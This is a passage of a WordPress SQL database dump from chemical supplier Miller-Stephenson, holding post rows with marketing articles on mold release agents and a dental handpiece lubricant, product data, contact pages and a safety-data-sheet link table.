INSERT INTO `wp_posts` VALUES (2648, 3, '2016-10-16 15:09:40', '2016-10-16 15:09:40', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed.PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">semi-permanent mold release agents</a> generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-16 15:09:40', '2016-10-16 15:09:40', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2649, 0, '2016-10-17 03:34:27', '2016-10-17 03:34:27', '', '', '', 'publish', 'closed', 'closed', '', '2649', '', '', '2016-10-17 03:34:27', '2016-10-17 03:34:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/2649/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2650, 3, '2016-10-17 14:37:49', '2016-10-17 14:37:49', '', 'Release Agents', '', 'inherit', 'closed', 'closed', '', 'shutterstock_278844821', '', '', '2016-11-22 21:03:25', '2016-11-22 21:03:25', '', 425, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_278844821.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2651, 3, '2016-10-17 14:40:12', '2016-10-17 14:40:12', '', 'Composite Mold Release Agent Water-based release agent', '', 'inherit', 'closed', 'closed', '', 'shutterstock_314501645', '', '', '2016-11-23 13:28:33', '2016-11-23 13:28:33', '', 290, 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_314501645.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2652, 75, '2016-10-17 15:00:49', '2016-10-17 15:00:49', '', '', '', 'publish', 'closed', 'closed', '', '2652', '', '', '2016-10-17 15:00:49', '2016-10-17 15:00:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/2652/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2653, 3, '2016-10-17 18:53:51', '2016-10-17 18:53:51', '<strong>Quik-Freeze MS-242L (Low Global Warming): </strong>\n<p class="h10">For hot intermittence testing of electronic components and protection of components during soldering. Excellent for cooling epoxy in composite forming and reducing tack in prepreg applications. Also used for freezing biological specimens. Instantly freezes small area to -54ºF(-47ºC) Compatible with most plastics, rubbers and metals. Nonflammable. Low GWP (global warming potential). No ODC (ozone depleting chemicals).</p>\n\n<table width="399">\n<tbody>\n<tr>\n<td width="219">Molecular Weight</td>\n<td style="text-align: center;" width="180">115</td>\n</tr>\n<tr>\n<td>Boiling Point</td>\n<td style="text-align: center;">-19°C</td>\n</tr>\n<tr>\n<td>Vapor Pressure (mmHg)</td>\n<td style="text-align: center;">60.8 psia @ 20°C</td>\n</tr>\n<tr>\n<td>Density</td>\n<td style="text-align: center;">1.17 @ 25°C</td>\n</tr>\n<tr>\n<td>VOC</td>\n<td style="text-align: center;">Exempt</td>\n</tr>\n<tr>\n<td>ODP</td>\n<td style="text-align: center;">0</td>\n</tr>\n<tr>\n<td>GWP</td>\n<td style="text-align: center;">0</td>\n</tr>\n</tbody>\n</table>', 'Quik-Freeze® MS-242N', 'For hot-cold intermittence testing of electronic components and protection of components during soldering. Excellent for cooling epoxy in composite forming and reducing tack in prepreg applications. Also used for freezing biological specimens. Instantly freezes small areas to -55°F/-48°C. Compatible with most plastics, rubbers and metals. Nonflammable. No ODC (ozone depleting chemicals). NSN 6850-01-333-1841.', 'inherit', 'closed', 'closed', '', '1719-autosave-v1', '', '', '2016-10-17 18:53:51', '2016-10-17 18:53:51', '', 1719, 'https://www.miller-stephenson.com/1719-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2654, 77, '2016-10-17 23:45:05', '2016-10-17 23:45:05', '', '', '', 'publish', 'closed', 'closed', '', '2654', '', '', '2016-10-17 23:45:05', '2016-10-17 23:45:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/2654/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2655, 0, '2016-10-18 01:56:30', '2016-10-18 01:56:30', '', '', '', 'publish', 'closed', 'closed', '', '2655', '', '', '2016-10-18 01:56:30', '2016-10-18 01:56:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/2655/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2656, 0, '2016-10-18 01:59:54', '2016-10-18 01:59:54', '', '', '', 'publish', 'closed', 'closed', '', '2656', '', '', '2016-10-18 01:59:55', '2016-10-18 01:59:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/2656/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2657, 78, '2016-10-18 09:25:20', '2016-10-18 09:25:20', '', '', '', 'publish', 'closed', 'closed', '', '2657', '', '', '2016-10-18 09:25:20', '2016-10-18 09:25:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/2657/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2658, 79, '2016-10-18 12:01:02', '2016-10-18 12:01:02', '', '', '', 'publish', 'closed', 'closed', '', '2658', '', '', '2016-10-18 12:01:03', '2016-10-18 12:01:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/2658/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2659, 80, '2016-10-18 12:18:39', '2016-10-18 12:18:39', '', '', '', 'publish', 'closed', 'closed', '', '2659', '', '', '2016-10-18 12:18:39', '2016-10-18 12:18:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/2659/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2660, 0, '2016-10-18 13:18:01', '2016-10-18 13:18:01', '', '', '', 'publish', 'closed', 'closed', '', '2660', '', '', '2016-10-18 13:18:01', '2016-10-18 13:18:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/2660/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2661, 81, '2016-10-18 15:19:44', '2016-10-18 15:19:44', '', '', '', 'publish', 'closed', 'closed', '', '2661', '', '', '2016-10-18 15:19:44', '2016-10-18 15:19:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/2661/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2662, 2, '2016-10-18 15:59:27', '2016-10-18 15:59:27', '<h1><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h1>\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from significant breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself, resulting in large deposit formation and a very noticeable increase in audible noise during operation.\r\n\r\nIn contrary, FluoroExtreme™  developed no deposits, the o-<wbr />rings remained intact, and the impellers exhibited minimal wear.  The handpiece also had no noticeable increase in turbine noise. The data clearly shows that Miller-<wbr />Stephenson’s FluoroExtreme™, delivers substantially improved operation of your dental handpiece. Our lubricant minimizes the unsightly degradation seen with hydrocarbon-<wbr />based lubricants while maintaining quiet and clean operation.  Something both the operator and patient will value.\r\n<h3><strong>Product Description</strong></h3>\r\nFluoroExtreme™ is a fluorinated synthetic lubricant specially designed for dental handpieces. This lubricant offers superior protection, lubricity, and chemical stability versus standard hydrocarbon based dental lubricants. FluoroExtreme™ minimizes mechanical wear in all low and high speed handpieces, allowing devices to run longer and quieter while reducing costly repair intervals.\r\n<p class="Body"><strong><span class="C-13">Benefits and Characteristics</span></strong></p>\r\n\r\n<ul>\r\n 	<li class="Body P-5"><span class="C-8">Minimizes mechanical wear</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Reduction in debris formation; Quieter operation</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Extends service life of critical components</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Non-<wbr />Flammable; Chemical and Thermal stability</span></li>\r\n 	<li class="Body P-5"><span class="C-8">Biocompatible (ISO 10993)</span></li>\r\n</ul>\r\n[ux_product_categories ids="12" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/product/fluoroextreme-dental-lubricant/">Click here</a> to find out more about these Dental Handpiece Lubricants.', 'Dental Handpiece Lubricant', '', 'inherit', 'closed', 'closed', '', '1128-revision-v1', '', '', '2016-10-18 15:59:27', '2016-10-18 15:59:27', '', 1128, 'https://www.miller-stephenson.com/1128-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2663, 0, '2016-10-18 16:48:09', '2016-10-18 16:48:09', '', '', '', 'publish', 'closed', 'closed', '', '2663', '', '', '2016-10-18 16:48:09', '2016-10-18 16:48:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/2663/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2664, 3, '2016-10-18 17:35:05', '2016-10-18 17:35:05', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed.PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-18 17:35:05', '2016-10-18 17:35:05', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2665, 82, '2016-10-18 18:30:45', '2016-10-18 18:30:45', '', '', '', 'publish', 'closed', 'closed', '', '2665', '', '', '2016-10-18 18:30:45', '2016-10-18 18:30:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/2665/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2666, 0, '2016-10-18 19:14:46', '2016-10-18 19:14:46', '', '', '', 'publish', 'closed', 'closed', '', '2666', '', '', '2016-10-18 19:14:46', '2016-10-18 19:14:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/2666/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2667, 84, '2016-10-18 19:50:30', '2016-10-18 19:50:30', '', '', '', 'publish', 'closed', 'closed', '', '2667', '', '', '2016-10-18 19:50:30', '2016-10-18 19:50:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/2667/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2668, 3, '2016-10-19 16:34:45', '0000-00-00 00:00:00', '', 'EPON article', '', 'draft', 'closed', 'closed', '', '', '', '', '2016-10-19 16:34:45', '2016-10-19 16:34:45', '', 0, 'https://www.miller-stephenson.com/?p=2668', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2669, 3, '2016-10-19 16:34:45', '2016-10-19 16:34:45', '', 'EPON article', '', 'inherit', 'closed', 'closed', '', '2668-revision-v1', '', '', '2016-10-19 16:34:45', '2016-10-19 16:34:45', '', 2668, 'https://www.miller-stephenson.com/2668-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2670, 88, '2016-10-19 17:27:11', '2016-10-19 17:27:11', '', '', '', 'publish', 'closed', 'closed', '', '2670', '', '', '2016-10-19 17:27:11', '2016-10-19 17:27:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/2670/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2671, 0, '2016-10-19 17:43:40', '2016-10-19 17:43:40', '', '', '', 'publish', 'closed', 'closed', '', '2671', '', '', '2016-10-19 17:43:40', '2016-10-19 17:43:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/2671/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2672, 0, '2016-10-19 19:01:35', '2016-10-19 19:01:35', '', '', '', 'publish', 'closed', 'closed', '', '2672', '', '', '2016-10-19 19:01:35', '2016-10-19 19:01:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/2672/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2673, 90, '2016-10-20 07:16:41', '2016-10-20 07:16:41', '', '', '', 'publish', 'closed', 'closed', '', '2673', '', '', '2016-10-20 07:16:41', '2016-10-20 07:16:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/2673/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2674, 0, '2016-10-20 13:05:19', '2016-10-20 13:05:19', '', '', '', 'publish', 'closed', 'closed', '', '2674', '', '', '2016-10-20 13:05:19', '2016-10-20 13:05:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/2674/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2676, 2, '2016-10-20 14:30:30', '2016-10-20 14:30:30', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ninja_forms_display_form id="1"]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>Global Offices</h3>\r\n<strong>Corporate Office</strong>\r\n55 Backus Ave.\r\nDanbury, CT 06810-7328\r\n800.736.5216\r\nFax 203.791.8702\r\ne-mail: ctsales@mschem.com\r\n\r\n<strong>Illinois</strong>\r\n6348 Oakton St.\r\nMorton Grove, IL 60053\r\n847.966.2022 / 800.447.4866\r\nFax 847.966.8468\r\ne-mail: ilsales@mschem.com\r\n\r\n<strong>California</strong>\r\n12261 Foothill Blvd.\r\nSylmar, CA 91342\r\n818.896.4714 / 800.771.8161\r\nFax 818.896.6086\r\ne-mail: casales@mschem.com\r\n\r\n<strong>Canada</strong>\r\n280 Belfield Road\r\nToronto, Ontario M9W 1H6\r\n800.307.2199\r\nFax 416.674.2987\r\ne-mail: canadasales@mschem.com\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col]\r\n\r\n[/col]\r\n\r\n[/row]', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2016-10-20 14:30:30', '2016-10-20 14:30:30', '', 120, 'https://www.miller-stephenson.com/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2677, 2, '2016-10-20 14:31:21', '2016-10-20 14:31:21', '<h3>For URGENT requests, please call us at: 800-736-5216 (8-4 EST)</h3>\r\n&nbsp;\r\n<h4>Techincal Support Request Form:</h4>\r\n[ninja_form id=11]', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2016-10-20 14:31:21', '2016-10-20 14:31:21', '', 122, 'https://www.miller-stephenson.com/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2678, 2, '2016-10-20 14:35:11', '2016-10-20 14:35:11', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 800-736-5216 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a 